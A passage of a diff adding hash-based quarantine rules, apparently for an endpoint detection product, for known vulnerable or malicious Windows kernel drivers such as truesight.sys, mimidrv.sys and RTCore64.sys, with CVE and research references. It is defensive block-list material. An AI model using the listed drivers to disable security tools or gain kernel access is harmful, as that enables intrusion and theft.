+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed2ed9fa-0961-54ec-a829-6e05aeb31293",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143360Z",
+ "creation_date": "2026-03-23T11:45:31.143362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e49ed9c5f345602eb9c0511eed977eb59a1f6d8dd0a570bea8fe10e77ce8a3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed2f455d-abcb-5b94-baf0-077990030263",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462792Z",
+ "creation_date": "2026-03-23T11:45:30.462795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462804Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a906251667a103a484a6888dca3e9c8c81f513b8f037b98dfc11440802b0d640",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed35e352-78fc-55dd-890e-7f1a063e3d9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153068Z",
+ "creation_date": "2026-03-23T11:45:31.153071Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c69bd737aaa422ca1cbf538ba38d8b46981f8252e9e1248f78844e7f261b5e69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed379425-d74d-5cf6-bfce-fd244eaaf1e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160493Z",
+ "creation_date": "2026-03-23T11:45:31.160496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160504Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58895b577db6e087173ac632247d3cc559fc5062980db333ca988313db4a1c2e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed486959-4dee-52af-8046-875acfd28e95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618185Z",
+ "creation_date": "2026-03-23T11:45:29.618187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8162811e8aae05884e8cb84b8dd87c310e5ed5ec588b9023a4d849d558d6ae34",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed71ad43-7ff2-5500-91e7-4ecc5a408a8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152315Z",
+ "creation_date": "2026-03-23T11:45:31.152318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75102e174a843b128893b570eacc87b575bfee22ac29cbdcce6fba133537a6b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed757c14-7fc0-5b0c-9383-5cd7d2188669",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985978Z",
+ "creation_date": "2026-03-23T11:45:29.985980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985986Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "751e9376cb7cb9de63e1808d43579d787d3f6d659173038fe44a2d7fdb4fd17e",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed767e9f-2b06-5dd5-aba0-6cff96246a89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607782Z",
+ "creation_date": "2026-03-23T11:45:29.607784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae6fb53e4d8122dba3a65e5fa59185b36c3ac9df46e82fcfb6731ab55c6395aa",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed851c6f-a459-5b06-9d90-c7829270b3ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817078Z",
+ "creation_date": "2026-03-23T11:45:31.817080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "967b589e8ddfcd69a0c8e0e11db85bbc50a7e6999fba524434dc23510c14d115",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed863673-1529-58f3-98e8-32331c537a77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473732Z",
+ "creation_date": "2026-03-23T11:45:31.473735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f8f06b727dd3e71b4cb51cabaf5dec26ec3416f2e09bfb1dbb15e06a12bc65a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed87a1a6-1ee2-5c69-93d9-9595e8df02a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619036Z",
+ "creation_date": "2026-03-23T11:45:29.619038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e69bba9f8aae090226841a02e6207fb37f784b83c6641ea15bd20e7bd3418d87",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed8cf419-0d64-5240-9d45-148be9987cf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490350Z",
+ "creation_date": "2026-03-23T11:45:31.490351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bbd19219a53633c7e815cefd2dbe0dab2eeffcdb35626a9ef3c6cef713f1c95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed8d4639-c927-590a-b507-416c40fc013f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967438Z",
+ "creation_date": "2026-03-23T11:45:29.967440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b16c3ed44cd04b033621ada7f9ab89d830949b3c9dc26999d862ddbeb7cc5a86",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed913085-5e2e-512f-aeab-3c058684ab9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620406Z",
+ "creation_date": "2026-03-23T11:45:29.620408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed9188d2-8033-52ac-a435-27ba71c9b60e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825793Z",
+ "creation_date": "2026-03-23T11:45:31.825797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66b6eac3fbe350daff338f36a721b9428ca0a0e68044c9922754470640dc4e30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed933ecb-779b-5fde-a7ed-512119307727",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615657Z",
+ "creation_date": "2026-03-23T11:45:29.615659Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1c18591d7b68fafa870f3d0f1124a353682765236674cc7476c5f1cc71b1528",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edbf231a-c25d-59b7-8492-85f5e2a0f5ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499856Z",
+ "creation_date": "2026-03-23T11:45:31.499859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5684e046f0ea1f403754d81777ebba5dc5988355c05e204910ba2b892e749cb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edc746f7-8927-589d-85ea-248801903fda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481841Z",
+ "creation_date": "2026-03-23T11:45:31.481844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa197d0569bc9871bcc78e307e744ccd973d05aaee2b1a297d2ad0c6df427262",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edd0faab-d72a-5a85-9fbd-174bc1f43368",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463642Z",
+ "creation_date": "2026-03-23T11:45:30.463646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "569fe70bedd0df8585689b0e88ad8bd0544fdf88b9dbfc2076f4bdbcf89c28aa",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edd30f7b-11e4-5764-ad93-d6d76cde2e6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828724Z",
+ "creation_date": "2026-03-23T11:45:31.828726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828732Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ceb5fb4546ea5cff844d1e0b90b60040bec49caaf4eed3b38a42e98952d62a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ede0e491-01da-5aa6-8da1-5bfc3f524519",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816785Z",
+ "creation_date": "2026-03-23T11:45:30.816787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11832c345e9898c4f74d3bf8f126cf84b4b1a66ad36135e15d103dbf2ac17359",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ede873ed-cb66-56de-ab35-1713983ebc34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143980Z",
+ "creation_date": "2026-03-23T11:45:32.143982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143988Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88f36fda7dcc6d5af2bcbef29d14fd4032247d4b45f5299944be31441ab53bc1",
+ "comment": "Vulnerable Kernel Driver (aka CSC.sys) [https://www.loldrivers.io/drivers/1c92e1bf-103b-4545-b242-e5a9858ec9c8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edf1a25a-2899-5820-b9ab-bb5b7a26aff9",
+ "test_maturity_current_count": 0,
